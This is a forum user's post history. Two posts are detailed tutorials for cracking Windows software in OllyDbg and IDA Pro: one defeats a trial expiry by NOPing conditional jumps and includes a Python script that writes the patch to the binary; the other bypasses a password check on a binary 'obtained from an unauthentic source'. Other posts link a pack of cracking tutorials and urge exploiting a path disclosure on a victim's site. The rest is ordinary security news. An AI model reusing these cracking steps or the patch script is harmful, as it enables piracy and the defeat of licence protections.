Everything posted by Aerosol

  1. Abstract

The objective of this paper is to explain how to crack an executable without peeking at its source code, using the OllyDbg tool. Although many tools can achieve the same objective, the beauty of OllyDbg is that it is simple to operate and freely available. We have already done a great deal of reverse engineering of .NET applications. This time, we are confronted with an application whose origin is unknown altogether. In simple terms, we do not have the actual source code; we have only the executable, which makes reverse engineering a far more tedious task.

Essentials

The security researcher must have rigorous knowledge of assembly language. The machine is expected to be configured with the following tools:

OllyDbg
Assembly programming knowledge
CFF Explorer

Patching Native Binaries

When the source code is not provided, it is still possible to patch the corresponding software binaries in order to remove various security restrictions imposed by the vendor, as well as to fix inherent bugs. A familiar type of restriction built into software is copy protection, which is normally enforced by the software vendor to prevent unlicensed use. In copy protection, the user is typically obliged to register the product before use. The vendor stipulates a time restriction on beta software in order to avoid license misuse and to permit the product to run only in a reduced-functionality mode until the user registers.

Executable Software

The following sample shows a way of bypassing or removing the copy protection in order to use the product without extending the trial duration or, in fact, without purchasing the full version. The copy protection mechanism often involves a process in which the software checks whether it should run and, if so, which functionality should be allowed. One type of copy protection common in trial or beta software allows a program to run only until a certain date. In order to explain reverse engineering, we have downloaded a beta version of software from the Internet that is operative for 30 days. As you can see, the trial application has expired, will not run any further, and shows an error message when we try to execute it. We don't know in which programming language or on which platform this software was developed, so the first task is to identify its origin. We can engage CFF Explorer, which displays significant information, such as the fact that this software was developed in VC++, as shown below. We can easily conclude that this is a native executable and that it does not execute under the CLR, so we can't use ILDASM or Reflector to analyze its opcodes. This time, we have to choose a different approach to crack the native executable.

Disassembling with OllyDbg

When we attempt to load the SoftwareExpiration.exe file, it refuses to run because the current date is past the date on which the authorized trial expired. How can we use this software despite the expiration of the trial period? The following section illustrates the steps for removing the copy protection restriction.

The Road Map

Load the expired program in order to understand what is happening behind the scenes.
Debug the program with OllyDbg.
Trace the code backward to identify the code path.
Modify the binary to force all code paths to succeed and never hit the trial expiration code path again.
Test the modifications.
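Since deciding whether the target is a managed (.NET) or native binary is the first step above, here is a minimal sketch of the kind of check CFF Explorer performs: a PE file is a .NET/CLR image only if its COM descriptor (CLR header) data directory is populated. This is an illustrative sketch, not part of the original article, and it assumes the third-party pefile module is installed.

import pefile  # third-party: pip install pefile

def is_clr_assembly(path):
    """Return True if the PE has a populated CLR (COM descriptor) data directory."""
    pe = pefile.PE(path)
    dirs = pe.OPTIONAL_HEADER.DATA_DIRECTORY
    # Data directory index 14 is IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (the CLR header).
    if len(dirs) <= 14:
        return False
    clr_dir = dirs[14]
    return clr_dir.VirtualAddress != 0 and clr_dir.Size != 0

if __name__ == '__main__':
    target = 'SoftwareExpiration.exe'  # the sample used in this article
    print('managed (.NET) binary' if is_clr_assembly(target) else 'native binary')

A native VC++ binary such as the one examined here would report "native binary", which is why ILDASM and Reflector are of no use and OllyDbg is brought in instead.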
Such tasks can also be accomplished with a more powerful tool, IDA Pro, but it is commercial and not freely available. OllyDbg is not as powerful as IDA Pro, but it is useful in many scenarios. First download OllyDbg from its official website and configure it properly on your machine. Its interface looks like this: Now open the SoftwareExpiration.exe program in the OllyDbg IDE via the File → Open menu, and it will disassemble the binary file. Don't be afraid of the bizarre-looking assembly code, because all the modifications are performed directly in that native assembly code. Here the red box shows the entry point instructions of the program, at address 00401204. The CPU main thread window displays the software code in the form of assembly instructions that are executed in top-to-bottom fashion. That is why, as we stated earlier, assembly programming knowledge is necessary when reverse engineering a native executable. Unfortunately, we don't have the actual source code, so how can we find our way around the assembly code? Here the error message “Sorry, this trial software has expired” can help us solve this problem, because with the help of this error message we can identify the actual code path that leads to it. While the error dialog box is still displayed, start debugging by pressing F9 or using the Debug menu. Now you can hunt for the time-limit code. Next, press F12 in order to pause the code execution so that we can find the code that causes the error message to be displayed. Okay. Now view the call stack by pressing Alt+K. Here, you can easily figure out that the trial error text is a parameter of MessageBoxA, as follows: Select the USER32.MessageBoxA entry near the bottom of the call stack, right-click, and choose “Show call”: This shows the calling location, with the assembly call to MessageBoxA selected. Notice the greater-than symbol (>) next to some of the lines of code; it indicates that another line of code jumps to that location. Directly before the call to MessageBoxA (in red in the right pane), four parameters are pushed onto the stack. Here the PUSH 10 instruction carries the > sign, meaning it is referenced by another line of code. Select the PUSH 10 instruction located at address 004011C0; the line of code that references the selected line is displayed in the text area below the top pane of the CPU window, as follows: Select that code in the text area and right-click to open the shortcut menu. It allows you to easily navigate to the code that refers to a selected line of code, as shown: We have now identified the actual line of code that is responsible for producing the error message, so it is time to make some modifications to the binary code. The context menu in the previous figure shows that both 00401055 and 00401063 contain a JA (jump if above) to the PUSH 10 used for the message box. First select Go to JA from 00401055 in the context menu. You should now be on the code at location 0x00401055. Your ultimate objective is to prevent the program from hitting the error code path. This can be accomplished by changing the JA instruction to NOP (no operation), which actually does nothing.
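The same edit can also be scripted against a copy of the file rather than made interactively. The sketch below is only an illustration and rests on two assumptions that are not from the article: that the JA instructions at these addresses are the short two-byte form (a near JA would be six bytes), and that the pefile module is available to translate the virtual addresses into file offsets.

import shutil
import pefile  # third-party: pip install pefile

SRC = 'SoftwareExpiration.exe'
DST = 'SoftwareExpiration_patched.exe'
JA_VAS = [0x00401055, 0x00401063]   # jump addresses identified in OllyDbg
JA_LEN = 2                          # assumed short-form JA (77 xx)

pe = pefile.PE(SRC)
offsets = [pe.get_offset_from_rva(va - pe.OPTIONAL_HEADER.ImageBase) for va in JA_VAS]
pe.close()

shutil.copyfile(SRC, DST)
with open(DST, 'r+b') as f:
    for off in offsets:
        f.seek(off)
        f.write(b'\x90' * JA_LEN)   # overwrite the conditional jump with NOPs
print('patched copy written to', DST)

In the article itself, the change is made interactively inside OllyDbg, as described next.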
Right-click the 0x00401055 instruction inside the CPU window, select Binary, and click Fill with NOPs, as shown below: This operation fills all the bytes of the instruction at 0x00401055 with NOPs: Go back to PUSH 10 by pressing the hyphen (-) key and repeat the previous process for the instruction at 0x00401063, as follows: Now save the modifications by right-clicking in the CPU window, clicking Copy to Executable, and then clicking All Modifications. Then hit the Copy all button in the next dialog box, as shown below: Right after hitting the “Copy all” button, a new window named “SoftwareExpiration.exe” will appear. Right-click in this window and choose Save File: Finally, save the modified or patched binary under a new name. Now load the modified program; you can see that no expiration error message is shown. We have successfully defeated the trial expiration restriction.

Final Note

This article demonstrated one way to challenge the strength of a copy protection measure using OllyDbg and to identify ways to make your software more secure against unauthorized use. By attempting to defeat the copy protection of your own application, you can learn a great deal about how robust the protection mechanism is. By doing this testing before the product becomes publicly available, you can modify the code to make circumvention of the copy protection more difficult before release. Source
  2. This article is dedicated to subverting the essential security restriction mechanisms of a native binary executable by employing the IDA Pro Disassembler. Compared with the previously demonstrated papers, it elaborates a more complex reverse engineering exercise; because it is a very exhaustive and long process, it demands a great deal of patience and proficiency with machine code instructions, but it is also very interesting and challenging. We have mostly focused on .NET reverse engineering so far, which is a relatively easy task compared with native binary reversing, because near-source code can be recovered straightforwardly with decompilers. This article should assist readers who have been looking for a step-by-step tutorial on IDA Pro reverse engineering, because no such paper has been crafted in this level of detail so far. This article covers the following contents:

Live Binary Sample Target
Target Analysis with IDA Pro
Cracking the Target
Alternative Way of Tracing
Final Note

There are any number of approaches to reverse engineering, and picking the appropriate one depends on the target program, the platform on which it runs and on which it was developed, and what kind of information you're seeking to extract. Generally speaking, there is one fundamental reversing methodology: offline analysis, which is all about taking a binary executable and using a disassembler to convert the machine code into a human-readable form. Reversing is then performed by manually reading and analyzing parts of that output. Offline code analysis is a powerful approach because it provides a good outline of the program and makes it easy to search for specific functions that are of interest. The disassembler is one of the most significant reverse engineering tools. Essentially, a disassembler decodes binary machine code into readable assembly language code; it merely decodes each instruction and creates a textual representation of it. Needless to say, the specific instruction encoding format and the resulting textual representation are entirely platform-specific: each platform provides a different set of instructions and registers, so a disassembler is also platform-specific (even though a couple of disassemblers support multiple platforms).

Essentials

The target file
IDA Pro interactive disassembler
PE signature verifier
Assembly language skills

Live Binary Sample Target

This time, I have chosen a target binary to reverse engineer whose origin is totally unknown to us. This executable first validates the user's identity by asking for a password. If the user enters the correct information, he is allowed to proceed; otherwise it echoes a wrong-password message on the screen. We obtained this binary from an unauthentic source, so we were not provided with the password token, which would probably be part of a license key. We have only the executable, not the source code, so we will have to figure out the mechanism implemented behind the scenes. Figure 1.1 So the only possibility left to carry on without buying the license code is to reverse engineer this binary file using the IDA Pro disassembler.
It is indispensable to confirm whether this target binary is a standard Windows PE file or belongs to some other platform, because a binary must carry the PE file signature; otherwise IDA Pro won't disassemble it as such. To check this, we can use PE Explorer to obtain the signature information of this binary from its File Header section, as follows. Figure 1.2 The figure clearly shows that this binary has a Windows PE signature and hence can be disassembled by IDA Pro, which we elaborate in the next section.

Target Analysis with IDA Pro

We have now obtained the origin information of the target file using PE Explorer. As we stated earlier, reversing with IDA Pro is truly a laborious task, because we have to deal with raw machine code. We don't have the source code, only the binary executable, so we first disassemble the binary using IDA Pro in order to comprehend what mechanics are implemented behind the scenes. Launch IDA Pro, and it will ask you to choose how the new disassembly should be started: Figure 1.3 After configuring the new project, IDA prompts you to open the target binary, as in the following figure. Figure 1.4 Right after the target file is chosen, IDA Pro displays a dialog offering three ways to load the file for reversing: as a PE file, a DOS executable file, or a plain binary file. These file types basically indicate the platform for which the file was built. In our scenario, the PE file option is the best fit because, as per figure 1.2, we are dealing with a Windows 32-bit console application. Apart from that, we can configure other options such as the processor type, kernel options, and DLL renaming, as follows: Figure 1.5 Finally, click OK. Don't be put off when IDA Pro prompts with a couple of alert messages in two different dialog windows; on the whole, a good deal of internal processing is done before a target file is opened. As you can see from the RED BOX in the following figure 1.6, we have a Functions window which enumerates all the methods and routines used in this executable. The graph overview window, also marked with a RED BOX, presents the control flow in flow-chart format; it provides a draggable dashed rectangle which lets us reach any point in the code. The BLUE BOX shows the disassembled code in assembly format and, most importantly, we can jump to any segment of code, such as the entry point, a text string, a binary pattern, or a marked position, just by dragging the pointer in the first RED BOX. Figure 1.6 The important point to note here is that the Debugger menu is only visible if the target file has a correct PE signature; otherwise it remains hidden. That's why it is better to identify the signature of the target file first, using PE Explorer. We shall accomplish the task of logic tracing by debugging the disassembled file. First, however, we choose the appropriate debugger; in our case, we pick the Local Win32 debugger, as follows: Figure 1.7 After ensuring the mandatory configuration, it is time to correlate the disassembly with the actual mechanism by using the arrow mentioned in the following figure 1.8; it basically takes some trial and error to find the actual execution path by dragging the pointer. The alert string message mentioned in figure 1.1 assists us in figuring out the execution path. In fact, this target file shows numerous execution paths; some of them are useful from the reversing point of view, and the remaining ones are useless.
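As an aside, the PE signature check that PE Explorer performed at the start of this section can be reproduced in a few lines: a Windows PE file starts with an 'MZ' DOS header whose field at offset 0x3C (e_lfanew) points to the 'PE\0\0' signature. The following is a minimal sketch; the file name is just a placeholder.

import struct

def has_pe_signature(path):
    """Return True if the file carries a DOS 'MZ' header and a 'PE\\0\\0' signature."""
    with open(path, 'rb') as f:
        if f.read(2) != b'MZ':
            return False
        f.seek(0x3C)                              # e_lfanew: file offset of the PE header
        pe_offset = struct.unpack('<I', f.read(4))[0]
        f.seek(pe_offset)
        return f.read(4) == b'PE\x00\x00'

print(has_pe_signature('target.exe'))             # placeholder file name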
Returning to the execution paths: the code flow that shows the alert message “Enter the password” is the most significant one from the reversing point of view, because it is the entry point from which we can trace the essential code. Figure 1.8 After moving the pointer to that location, we can see the actual logic flow of the mechanism, as follows. It shows the control flow taken when we enter a wrong password value. Figure 1.9 The logic flow shown in the preceding figure usually does not fit in the work area window. For this reason, we can move the dashed rectangle in the graph overview by dragging it to reach a specific segment, as follows: Figure 1.10 After moving the pointer to the appropriate location, we find the disassembled code in assembly language format. Here, we can easily see that this program prompts the user to enter the password via the scanf call highlighted in the RED BOX. That value is then compared with a predefined string (the password) using the strcmp call. The eax register holds 0 or 1 depending on the outcome of the string comparison and is checked by the test instruction. Finally, the jnz instruction makes execution jump directly to the false branch, at location 411444. Figure 1.11 If the eax register contains the value 0, the condition is true and code execution is directed to the box highlighted in cyan. If it holds the value 1, the control flow diverts toward the false-condition block, as follows: Figure 1.12 If the user enters the correct password, the following assembly code segment is executed, in which the “congratulations” message is displayed first, along with the actual password information, as follows: Figure 1.13 As we stated earlier, the code flow instructions are huge in quantity, so we have to move the dashed rectangle from time to time in order to reach the specific code block. This time we move to the false-condition block, as follows: Figure 1.14 If the eax register doesn't contain the value 0, execution is diverted toward the block in the following figure, where the “Wrong Password! Try again” message is printed on the screen, as shown below. Figure 1.15 Finally, no matter what value the eax register holds, execution always reaches the following assembly instructions, where the getch call is made every time: Figure 1.16 So, we have successfully read through the target assembly code and correlated it with the actual mechanism running behind the scenes. We have come to the conclusion that the eax register value is the key: if its value is 0, we enter the true-condition code block; otherwise we enter the false-condition block.

Cracking (Reversing) the Target

So, the eax register value is of key interest to a reverser seeking to subvert the password mechanism. If we change that value manually during debugging, we can reach the true-condition block even if we enter the wrong password. Here, our main objective is to defeat the conditional jump (jnz) so that the branch to loc_411444 never happens. To do so, run this application in debugging mode, but first place a breakpoint at the test eax instruction using F2. The instruction will be highlighted in red, as follows: Figure 1.17 Then run this executable with Start Process (F9) from the Debugger menu. Again, a couple of windows appear and then disappear, as usual. Figure 1.18 After that, the target starts to execute in a DOS console window, because it is a console application.
Here, it asks the user to enter the password, as per its functionality, but unfortunately we don't have the password. So just enter any value as the password and press Enter. Figure 1.19 The moment we press Enter after typing a bogus password value such as “test”, execution is transferred to IDA View-A, and we reach the instruction where we placed the breakpoint earlier. We then move ahead manually by pressing Step Into (F7) and step forward to the jump instruction. Here we notice that the green arrow (in the RED BOX) starts blinking, which indicates that execution is about to transfer to the B31444 block. If we do nothing, the wrong-password message is displayed as usual. Figure 1.20 Execution is transferred to the B31444 (false condition) block because the eax register holds the value 1. The transfer to the false-condition block happens because the ZF flag is 0; if this value were 1, the true-condition block would execute. Figure 1.21 However, if we modify the value of ZF to 1, we can steer the code path into the true-condition block. In order to change this value, right-click the ZF value and select Modify value: Figure 1.22 Here, just change the ZF flag from 0 to 1 and click OK. Figure 1.23 The moment the ZF value is changed to 1, we notice that the execution flow instantly switches to the true-condition block, indicated by the repeatedly blinking red arrow in the BOX, as follows: Figure 1.24 Now go to the Debugger menu and choose the Run until return option, which ends the execution after reaching the end of the code. Bingo!!! The target binary shows the congratulations message even though we entered a wrong password value. In addition, the program reveals the original password: ajay. Figure 1.25 So, we successfully subverted the password security mechanism just by diverting the binary's control flow at run time. To clear up a common misconception, though: we have only reverse engineered this target file; it has not been patched. The password restriction is still in place, because we have not modified the corresponding bytes.

Alternative Way of Tracing

Identifying the program entry point is always complex in IDA Pro because it shows raw assembly code. We did it above by moving the arrow, as in Figure 1.8, but this is a very cumbersome task. There is another way that eases the task of identifying such entry points. A program displays certain strings to carry execution forward or to help the user control the execution. Consider the following figure: it asks the user to enter the password by prompting with the “Please enter the password” string. Figure 1.26 This string can be beneficial for finding the entry point. So go to Text search and enter this string in the box, which finds such entries in the assembly code, as follows: Figure 1.27 Alternatively, the Strings window displays all the built-in string values of the target program. Just double-click the “Please enter the password” string, and it redirects us to its assembly code. Figure 1.28 Here we see the code not in flow-chart format but as actual assembly, and we have reached the location where the string is referenced. Place the breakpoint here with F2, as before.
Then follow the same steps as performed earlier from Figure 1.18: Figure 1.29

Final Note

This article illustrated the process of disassembling a native binary and the reverse engineering tactics that can be applied to it using the IDA Pro disassembler. We have seen how important register values are for correlating binary code with the actual program implementation, and what role they play in the reversing process. We subverted the password mechanism just by modifying the value of the ZF flag, which is set by the comparison involving the eax register. This tutorial was dedicated to reversing the logic flow only, not patching the bytes associated with the mechanism. There is no permanent change to the bytes on disk; if we run this target again without IDA Pro, the password mechanism is still there and is not bypassed. We will discuss byte patching in detail in the next article. Source
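As a recap of the logic traced above, the password gate boils down to a few lines of high-level code. The sketch below is a hypothetical reconstruction of what the scanf/strcmp/test/jnz sequence implements, not the program's actual source; the prompt, the messages, and the password "ajay" are taken from the walkthrough.

PASSWORD = 'ajay'   # recovered at the end of the walkthrough

def password_gate():
    guess = input('Please enter the password: ')   # scanf reads the user's input
    mismatch = (guess != PASSWORD)                 # strcmp returns 0 on a match; test eax, eax sets ZF
    if mismatch:                                   # jnz takes the false branch when ZF == 0
        print('Wrong Password! Try again')
    else:
        print('congratulations, the password is', PASSWORD)
    input()                                        # stands in for getch(), reached on both paths

password_gate()

Flipping ZF in the debugger is equivalent to forcing the "mismatch" test to look false for one run, which is why the congratulations branch executes without the file being patched.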
  3. Tutorial #1 - What is reverse engineering?
Tutorial #2 - Introducing OllyDBG
Tutorial #3 - Using OllyDBG, Part 1
Tutorial #4 - Using OllyDBG, Part 2
Tutorial #5 - Our First (Sort Of) Crack
Tutorial #6 - Our First (True) Crack
Tutorial #7 - More Crackmes
Tutorial #8 - Frame Of Reference
Tutorial #9 - No Strings Attached
Tutorial #10 - The Levels of Patching
Tutorial #11 - Breaking In Our Noob Skills
Tutorial #12 - A Tougher NOOBy Example
Tutorial #13 - Cracking a Real Program
Tutorial #14 - How to remove nag screens
Tutorial #15 - Using the Call Stack
Tutorial #16A - Dealing with Windows Messages
Tutorial #16B - Self Modifying Code
Tutorial #16C - Bruteforcing
Tutorial #17 - Working with Delphi Binaries
Tutorial #18 - Time Trials and Hardware Breakpoints
Tutorial #19 - Creating patchers
Tutorial #20A - Dealing with Visual Basic Binaries, Part 1
Tutorial #20B - Dealing with Visual Basic Binaries, Part 2
Tutorial #21 - Anti-Debugging Techniques
Tutorial #22 - Code Caves and PE Sections
Tutorial #23 - TLS Callbacks

Modifying Binaries For Fun And Profit
Adding a Splash Screen - Creating a code cave to show a custom splash on an application
Adding a Menu Item - Adding a menu item to an existing binary
Making a Window Non-Closeable - Making a window non-closeable
The Never Ending Program - Opening message boxes every time a user tries to close a program
DLL Injection 1 - Adding an opening message box through DLL injection
DLL Injection 2 - Adding a splash bitmap through DLL injection

R4ndom's Guide to RadASM
Installing and setting up - Installing RadASM and configuring the environment
Creating our first project - Creating our first project
Adding an Icon and Menu - Adding an icon and menu

Miscellaneous
The Reverse Engineer's Toolkit - Tools every reverse engineer should know about
Shrinking C++ Binaries - Shrinking binaries through Visual Studio

Other Tutorials (Author - Tutorial)
XOR06 - Cracking DriverFinder
nwokiller - Unpacking PELock v1.06
XOR06 - Bypassing a keyfile
XOR06 - Bypassing a Serial and server Check
XOR06 - Bypassing a Serial in a Delphi Binary
XOR06 - Finding a serial using bitmaps
XOR06 - Easy unpacking
XOR06 - Where and How to patch a serial routine
XOR06 - Patching a server check, 30 day time trial, and a nag
XOR06 - Serialfishing a correct serial
XOR06 - Another way of finding the patch
XOR06 - Why it's so important to search for pointers
XOR06 - .NET Crackme with tutorial
XOR06 - .NET Crackme (no tutorial)

Filesize: 171.69 MB
Link: https://tuts4you.com/request.php?3554
  4. CrowdRE – Crowdsourced Reverse Engineering: The CrowdRE project aims to fill this gap. Rather than using a live distribution of changes to all clients, which has proven to fail in the past, it borrows the architecture that has been used with success to organize source code repositories: a system that manages a history of changesets as commit messages. The CrowdRE client is now freely available as an IDA Pro plugin. CrowdStrike maintains a central cloud for the community to share their commits with each other. This basic concept is sufficient for a collaborative workflow on a per-function basis for a shared binary. One exciting feature is a similarity hashing scheme that considers the basic block boundaries of a function: each function is mapped to a similarity-preserving hash of fixed size. https://crowdre.crowdstrike.com/sign-in

Tutorial: OLLYDBG
TOOL: Version 2.01 alpha 2. This tool is mostly used for reverse engineering. With its help we can work out our own license keys, and trial versions can be cracked with OllyDbg. The most important novelty is that this version is compatible with Windows 7. I have tested it under Win7 Home Premium 32-bit. http://www.ollydbg.de/odbg201b.zip

Tutorial: HEX WORKSHOP
TOOL: The Hex Workshop Hex Editor is a set of hexadecimal development tools for Microsoft Windows, combining advanced binary editing with the ease and flexibility of a word processor. With Hex Workshop you can edit, cut, copy, paste, insert, and delete hex, print customizable hex dumps, and export to RTF or HTML for publishing. Additionally you can goto, find, replace, compare, calculate checksums, add smart bookmarks, color map, and generate character distributions within a sector or file. Hex Workshop supports drag and drop and is integrated with the Windows operating system, so you can quickly and easily hex edit from your most frequently used workspaces. The Data Inspector is perfect for interpreting, viewing, and editing decimal and binary values. Arithmetic, logical, ASCII case, and bitwise operations can be used to help manipulate your data in place. An integrated Structure Viewer allows you to view and edit data in the most intuitive and convenient way. The Structure Viewer supports nested structures, references to other structures, and many atomic data types: char, byte, ubyte, word, uword, long, ulong, longlong, float, double, OLE Date/Time, DOSTIME, DOSDATE, FILETIME, and time_t.
Link: Hex Workshop: Hex Editor, Sector Editor, Base Converter and Hex Calculator for Windows
Source
  5. Bro, do you have any idea how much a path disclosure on vic's site is worth? You can find the hidden Indian porn stashed in there! ) @cotnariUK you're great, man....
  6. A Minnesota District Court ruling this week related to the 2013 Target data breach has opened the door for banks to pursue damages from retailers victimized by a data breach. Judge Paul A. Magnuson ruled that Target was negligent in ignoring and, in some cases, turning off security features that the court said would have stopped the 2013 holiday shopping season breach. In a 16-page explanation, Magnuson concluded that financial institutions pursuing compensation from Target in court can continue with class-action lawsuits. “This opens the door to a legal precedent that if you get breached, you’re now automatically responsible for all the bank costs they can think of,” said Gartner vice president and distinguished analyst Avivah Litan. “Now what governs rules of liability are Visa and Master Card rules, and those are not law, they’re rules of the card brands. Now, those rules are becoming law.” The bone of contention in the Minnesota ruling is that Target ignored alerts set off by a FireEye malware detection system installed months prior to the breach. Target’s contention is that the system fired off thousands of alarms, and that it was impossible to distinguish between less important alerts, false positives and the more serious indications that an intrusion had occurred. The Target hackers were able to access the giant retailer’s network by using the compromised credentials of a HVAC vendor contracted by Target. The hackers were able to use those credentials to burrow deep into the retailer’s network, install point-of-sale malware on terminals in many of its locations in the U.S., and then siphon off 40 million payment card numbers and security codes, and the personal information of 70 million customers. The data was stored on servers inside the Target network until it was exfiltrated by the hackers, investigators have revealed. “Although the third-party hackers’ activities caused harm, Target played a key role in allowing the harm to occur,” Magnuson wrote in his ruling. “Indeed, Plaintiffs’ allegation that Target purposely disabled one of the security features that would have prevented the harm is itself sufficient to plead a direct negligence case.” Litan questioned the ruling from the sense that Target’s difficulties in properly analyzing alerts from its detection systems are not unique. “It’s not fair at all. I’m sure the alarms went off at Chase as well,” Litan said, referring to a massive breach at JP Morgan Chase this summer. “These systems put out hundreds of thousands of alerts a day and it’s difficult to know which are important. It’s wrong to pull out the FireEye alerts and say Target didn’t listen to them. This demonstrates the difficulty in keeping up with security monitoring. Target is not alone; they’re not the only institution that can’t keep up with 100,000 alerts an hour. Look what happened with JP Morgan Chase, and they’ve got a $250 million budget allocated to cyber.” Data breaches have been a fairly regular occurrence for close to a decade. The response of banks in the early hey-day of ChoicePoint, CardSystems, Heartland and other massive breaches was to roll out the Payment Card Industry Data Security Standard (PCI-DSS) and shift responsibility for securing payment systems onto the retailers. Next October, chip-and-PIN rollouts are expected to accelerate in the U.S. as a shift in liability happens where the party with the lesser standard of care becomes responsible in the event of a breach. 
For example, if mag stripe data is stolen from a retailer that supports chip-and-PIN cards, for example, the card-issuing bank assumes liability. Retailers, meanwhile, have argued that they too have borne tremendous costs because of breaches. In a letter from a number of prominent retail associations, including the National Retail Federation and the Retail Industry Leaders Association, to the Credit Union National Association and National Association of Federal Credit Unions, retailers argue that costs are borne equally with financial institutions and that retailers do contribute to the costs of issuing new cards to consumers post-breach. Retailers also pointed out in the letter dated Oct. 30 that merchants collectively spend $6 billion annually on data security and are proactively leading the charge for chip-and-PIN deployments. They back up their case, demonstrating that outside the U.S., 70 percent of merchants support chip-and-PIN point-of-sale terminals (40 percent of consumers carry upgraded chip cards), whereas in the U.S., 20 percent of merchants have upgraded terminals, but fewer than one percent of cards have chips rather than mag stripes. “The most unfair part of this is that the banks saw this coming in 2006 and their response was PCI and to put security problems on the retailers,” Litan said. “And only now are they moving to chip-and-PIN. Target would not have happened. Home Depot would not have happened if they’d acted quickly then. You cannot rely on millions of retailers to secure insecure payment systems.” Source
  7. Adobe is expected to update its Reader and Acrobat software next Tuesday as part of its scheduled security updates, and the updates will, according to an Adobe spokesperson, include patches for a Reader vulnerability disclosed this week by Google’s Project Zero. Researcher James Forshaw, a well-known bug-hunter and Project Zero member, went public with details of a sandbox escape vulnerability in Reader as well as exploit code. Per its policy, Google’s security research team discloses vulnerability details 90 days after it shares those details with the vendor in question. In this case, the vulnerability was partially addressed earlier by Adobe after it was reported in August. Adobe tweaked Reader in order to make exploiting the vulnerability much more difficult. The flaw, however, had not been patched. In a pre-notification advisory published yesterday afternoon, Adobe said it will release a security update for Adobe Reader 11.0.09 and earlier, and 10.1.12 and earlier, as well as Acrobat 11.0.09 and earlier, and Acrobat 10.1.12 and earlier. Forshaw said the vulnerability is a race condition in the handling of the MoveFileEx call hook in Adobe Reader. “This race can be won by the sandboxed process by using an OPLOCK to wait for the point where the MoveFileEx function opens the original file for the move. This allows code in the sandbox to write an arbitrary file to the file system,” Forshaw wrote in the Project Zero bug report. Adobe’s adjustment to Reader in version 11.0.9 prevented the vulnerability from using the broker file system hooks to create directory junctions, Forshaw said. Forshaw’s disclosure came a week after Adobe released an emergency security update for Flash Player. The Nov. 25 update patched a code-execution vulnerability in Flash that was already being exploited in the Angler and Nuclear exploit kits, French researcher Kafeine discovered. Adobe thought it had patched the issue in question with its October security updates that addressed three memory-corruption vulnerabilities. The emergency patch resolved a fourth, CVE-2014-8439. “These updates provide additional hardening against a vulnerability in the handling of a dereferenced memory pointer that could lead to code execution,” Adobe said in its advisory. Source
  8. Researchers are starting to stitch together clues about the wiper malware that has landed a body blow to Sony Pictures Entertainment. Not only were thousands of files and documents leaked that included unreleased movies, confidential company presentations and financial records, employee records, passwords and more, but an untold number of machines were left unusable by malicious code identified as Destover. Destructive attacks aren’t new, and they’re happening with frequency at different scales. Smaller companies and individuals are falling victim to new strains of ransomware at alarming rates. CryptoLocker, for example, encrypts files on a compromised machine, promising a decryption key if a ransom is paid. Destover, and the like, are much more dangerous in that they overwrite the master boot record on a computer, not only rendering the computer useless after robbing it blind, but also leaving few bread crumbs for investigators to follow. Kaspersky Lab researcher Kurt Baumgartner today published a report exposing Destover’s functionality and describing similarities between this malware and similar code used in the Shamoon attack against Saudi Aramco and the DarkSeoul attack last year in South Korea. Across the three attacks, Baumgartner notes the use of commercially available Eldos RawDisk driver files (Shamoon and Destover), that wiper drivers are maintained in the dropper’s resource section (Shamoon, Destover), and disk data and the MBR are overwritten with encoded political messages (Shamoon, DarkSeoul). Destover, Baumgartner said, was compiled anytime in the 48 hours prior to the attack, similarly to the DarkSeoul attacks, and that the attackers already had a longstanding foothold on the network. Shamoon was also compiled in the days leading up to the Aramco attack, a tight timeline given the number of workstations (30,000-plus) that were damaged. “In all three cases: Shamoon, DarkSeoul and Destover, the groups claiming credit for their destructive impact across entire large networks had no history or real identity of their own,” Baumgartner wrote. “All attempted to disappear following their act, did not make clear statements but did make bizarre and roundabout accusations of criminal conduct, and instigated their destructive acts immediately after a politically-charged event that was suggested as having been at the heart of the matter.” In the case of Destover, the popular narrative has been to blame North Korea for the attack on Sony in retaliation for the upcoming release of “The Interview” in which the plot revolves around a fictional attempt by the CIA to assassinate North Korea’s leader Kim Jong Un. When details regarding “The Interview” were announced in June, a spokesman for the North Korean Foreign Ministry condemned the film, calling it a “blatant act of terrorism and war.” In his report, Baumgartner explains other similarities between the three attacks, including their use of the EldoS RawDisk drivers to overwrite disk data and the MBR, backdoors used in the attack, and the potential for data recovery. “The above list of commonalities does not, of course, prove that the crew behind Shamoon is the same as the crew behind both DarkSeoul and Destover. But it should be noted that the reactionary events and the groups’ operational and toolset characteristics all carry marked similarities,” Baumgartner wrote. 
“And, it is extraordinary that such unusual and focused acts of large scale cyber-destruction are being carried out with clearly recognizable similarities.” The Sony saga picked up steam this week not only as the leaks intensified, but also after the FBI on Sunday issued a confidential flash alert to enterprises in the United States warning them of wiper malware attacks. The FBI did not name any victims such as Sony in the flash alert, but Ars Technica today reported it had seen the memo and shared some of its contents, including a Snort rule for the signal sent to the malware’s command and control infrastructure, and a YARA rule to be used for detection. News on the Sony attack broke before Thanksgiving last week when it was reported that most internal systems were down and unusable. Screens on internal workstations popped up claiming that Sony had been “Hacked By #GOP,” a hacker group named Guardians of Peace. The notice, alongside a red skull, went on to warn the company that it had “obtained all your internal data including your secrets and top secrets” and that it would release it unless the company obeyed the group. Source
  9. WASHINGTON D.C. — It’s 2020, bitter cold outside, you’re running late for work, and the Linux box that controls your car isn’t going to start unless you wire $20 worth of Bitcoin to an increasingly business-like criminal enterprise operating out of Eastern Europe. Of course it’s not 2020. And to date there’s been no public instance of ransomware – let alone regular malware – targeting the onboard operating system of an automobile. However, in a panel discussion at Georgetown Law’s “Cybercrime 2020: The Future of Online Crime and Investigations” conference this morning, Dino Dai Zovi, “Hacker in Residence” at the New York University Polytechnic School of Engineering, reasoned that if the price were low enough, nearly anyone would pay to unlock their car. To this, Michael Stawasz, the panel’s moderator and the deputy chief of the Computer Crime & Intellectual Property Section (CCIPS) at Department of Justice, wondered aloud if there would come a point where his refrigerator was pinching him for $.25 every time he tried to make a sandwich. Indeed the panel agreed that ransomware is likely the future of cybercrime, at least as far as consumers are concerned. “I think we are going to see ransomware scale well in the Internet of things,” Dai Zovi said. “It’s already targeting networked storage.” Martin Libicki, senior management scientist at RAND Corporation explained that so much of the cybercrime world is presently focused on converting information into money. When a payment processor at a retail location is compromised, in order to actually make money, the criminals then not only have to transfer that information away from the retailer but they also have to find a way of actually withdrawing money from those corresponding bank accounts or credit lines. Under the current system in the U.S., criminals are getting more efficient at translating data into money. However, the panel agreed, this will become more difficult as banking security becomes more sophisticated and as more secure payment forms like EMV become the norm. Contrast that with a simple, two-step ransomware scheme, which encrypts or locks a machine and demands direct payment to decrypt it or unlock it, and crypto and locker malware starts to seem immortal. As a 